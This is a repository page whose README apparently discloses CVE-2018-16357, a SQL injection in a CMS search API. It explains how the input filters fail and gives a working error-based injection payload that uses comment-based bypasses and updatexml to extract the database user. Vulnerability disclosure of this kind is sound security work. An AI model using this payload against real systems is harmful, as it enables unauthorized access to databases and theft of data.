# CVE-2018-16357

**Repository Path**: escape_wang/CVE-2018-16357

## Basic Information

- **Project Name**: CVE-2018-16357
- **Description**: CVE-2018-16357  detail
- **Primary Language**: Unknown
- **License**: Not specified
- **Default Branch**: master
- **Homepage**: None
- **GVP Project**: No

## Statistics

- **Stars**: 0
- **Forks**: 0
- **Created**: 2018-09-13
- **Last Updated**: 2020-12-18

## Categories & Tags

**Categories**: Uncategorized

**Tags**: None

## README

# CVE-2018-16357

#### 项目介绍
CVE-2018-16357  detail

#IMGB1 Threre is a sql injection via api.php/Cms/search?#acode=1&num=1&order=1

parameter $field is what we can control,go to check the function filter

![输入图片说明](https://images.gitee.com/uploads/images/2018/0913/110409_8bded381_2104759.png "屏幕截图.png")

use function trim and escape_string to avoid sql injection

![输入图片说明](https://images.gitee.com/uploads/images/2018/0913/110420_5d4a2783_2104759.png "屏幕截图.png")

add a ' and it cause mysql syntax error,so the function escape_string is not effective

![输入图片说明](https://images.gitee.com/uploads/images/2018/0913/110431_3d51128b_2104759.png "屏幕截图.png")

use /\*\*/ to bypass the function trim

payload:field=1)/\*\*/and/\*\*/updatexml(1,concat(0x7e,(SELECT/**/user()),0x7e),1)#&keyword=title&scode=1

![输入图片说明](https://images.gitee.com/uploads/images/2018/0913/110445_868953df_2104759.png "屏幕截图.png")